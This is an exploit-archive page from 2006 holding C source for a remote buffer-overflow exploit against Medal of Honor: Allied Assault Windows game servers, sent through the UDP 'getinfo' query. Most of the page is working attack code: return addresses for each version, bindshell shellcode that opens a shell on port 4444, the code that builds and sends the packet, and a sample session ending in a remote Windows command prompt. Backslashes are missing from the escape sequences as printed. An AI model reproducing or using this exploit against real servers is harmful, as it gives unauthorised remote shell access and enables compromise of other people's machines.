[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Medal of Honor (getinfo) Remote Buffer Overflow Exploit
# Published : 2006-05-10
# Author : RunningBon
# Previous Title : MySQL <= 5.0.20 COM_TABLE_DUMP Memory Leak/Remote BoF Exploit
# Next Title : MySQL (<= 4.1.18, 5.0.20) Local/Remote Information Leakage Exploit
/*
MOHAA Win32 Server Buffer-Overflow Exploit (getinfo)
Written by RunningBon
Please use this responsibly, as I am not responsible for any damage you cause by using it.
IRC: irc.rizon.net #kik
E-mail: runningbon@gmail.com
Thanks to: Luigi Auriemma, Metasploit, everyone else (You know who you are.)
Example:
C:>MOHAAExploit.exe 192.168.2.44 12203 MOHAA-v1.11
MoHAA Server Buffer overflow exploit
Written by RunningBon
E-Mail: runningbon@gmail.com
IRC: irc.rizon.net #kik
Attempting to exploit 192.168.2.44:12203, running version MOHAA-v1.11.
Building packet.
Sending packet.
Packet sent.
Check for your shell on port 4444.
C:>telnet 192.168.2.44 4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:Program FilesEA GAMESMOHAA>
*/
#include <stdio.h>
#include <windows.h>
struct VersionStruct {
char *pName;
DWORD dwNewEIP;
DWORD dwFillLength;
};
VersionStruct Versions[] = {
"MOHAA-v1.11", 0xCBB935, 516,
"MOHAA:S-v2.15", 0x923575, 516,
//Add MOHAA:Breakthrough support
};
#pragma comment (lib, "ws2_32.lib")
//Port 4444 bindshell
unsigned char szShellcode[] =
"x2bxc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x42"
"xecxeex81x83xebxfcxe2xf4xbex86x05xccxaax15x11x7e"
"xbdx8cx65xedx66xc8x65xc4x7ex67x92x84x3axedx01x0a"
"x0dxf4x65xdex62xedx05xc8xc9xd8x65x80xacxddx2ex18"
"xeex68x2exf5x45x2dx24x8cx43x2ex05x75x79xb8xcaxa9"
"x37x09x65xdex66xedx05xe7xc9xe0xa5x0ax1dxf0xefx6a"
"x41xc0x65x08x2exc8xf2xe0x81xddx35xe5xc9xafxdex0a"
"x02xe0x65xf1x5ex41x65xc1x4axb2x86x0fx0cxe2x02xd1"
"xbdx3ax88xd2x24x84xddxb3x2ax9bx9dxb3x1dxb8x11x51"
"x2ax27x03x7dx79xbcx11x57x1dx65x0bxe7xc3x01xe6x83"
"x17x86xecx7ex92x84x37x88xb7x41xb9x7ex94xbfxbdxd2"
"x11xbfxadxd2x01xbfx11x51x24x84xffxddx24xbfx67x60"
"xd7x84x4ax9bx32x2bxb9x7ex94x86xfexd0x17x13x3exe9"
"xe6x41xc0x68x15x13x38xd2x17x13x3exe9xa7xa5x68xc8"
"x15x13x38xd1x16xb8xbbx7ex92x7fx86x66x3bx2ax97xd6"
"xbdx3axbbx7ex92x8ax84xe5x24x84x8dxecxcbx09x84xd1"
"x1bxc5x22x08xa5x86xaax08xa0xddx2ex72xe8x12xacxac"
"xbcxaexc2x12xcfx96xd6x2axe9x47x86xf3xbcx5fxf8x7e"
"x37xa8x11x57x19xbbxbcxd0x13xbdx84x80x13xbdxbbxd0"
"xbdx3cx86x2cx9bxe9x20xd2xbdx3ax84x7exbdxdbx11x51"
"xc9xbbx12x02x86x88x11x57x10x13x3exe9xb2x66xeaxde"
"x11x13x38x7ex92xecxeex81";
void Error(char *pString)
{
printf("[ERROR] %sn", pString);
ExitProcess(0);
}
int Exploit(char *pIP, int iPort, VersionStruct *pVersion)
{
WSAData WSADATA;
SOCKET Socket = NULL;
sockaddr_in SockAddr;
char szHeader[] = "xffxffxffxffx02getinfo ";
char szBuffer[4096];
int iLen = 0;
WSAStartup(MAKEWORD(1, 1), &WSADATA);
if((Socket = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == SOCKET_ERROR)
{
Error("socket()");
return 0;
}
SockAddr.sin_addr.s_addr = inet_addr(pIP);
SockAddr.sin_port = htons(iPort);
SockAddr.sin_family = AF_INET;
printf("Building packet.n");
memset(szBuffer, 0, sizeof(szBuffer));
memcpy(szBuffer, szHeader, sizeof(szHeader) - 1);
iLen += sizeof(szHeader) - 1;
memset(szBuffer + iLen, 'z', pVersion->dwFillLength);
iLen += pVersion->dwFillLength;
memcpy(szBuffer + iLen, (LPVOID)&pVersion->dwNewEIP, sizeof(DWORD));
iLen += sizeof(DWORD);
memcpy(szBuffer + iLen, szShellcode, sizeof(szShellcode));
iLen += sizeof(szShellcode);
printf("Sending packet.n");
if(sendto(Socket, szBuffer, iLen, 0, (sockaddr*)&SockAddr, sizeof(SockAddr)) == SOCKET_ERROR)
{
Error("sendto()");
return 0;
}
printf("Packet sent.n");
return 1;
}
void PrintWelcome()
{
printf(
"MoHAA Server Buffer overflow exploitn"
"Written by RunningBonn"
"E-Mail: runningbon@gmail.comn"
"IRC: irc.rizon.net #kikn"
"n"
);
}
void PrintUsage(char *pPath)
{
printf("Usage: %s <IP> <Port> <Version Name>nn", pPath);
printf("Supported Version List:n");
for(int i = 0; i < sizeof(Versions) / sizeof(Versions[0]); i++)
{
printf("%sn", Versions[i].pName);
}
}
int main(int argc, char **argv)
{
VersionStruct *pVersion = NULL;
PrintWelcome();
if(argc < 4)
{
PrintUsage(argv[0]);
return 0;
}
for(int i = 0; i < sizeof(Versions) / sizeof(Versions[0]); i++)
{
if(!stricmp(argv[3], Versions[i].pName))
{
pVersion = &Versions[i];
break;
}
}
if(pVersion == NULL)
{
Error("Invalid version.");
}
printf("Attempting to exploit %s:%d, running version %s.n", argv[1], atoi(argv[2]), pVersion->pName);
if(Exploit(argv[1], atoi(argv[2]), pVersion))
{
printf("Check for your shell on port 4444.n");
}
return 0;
}
// www.Syue.com [2006-05-10]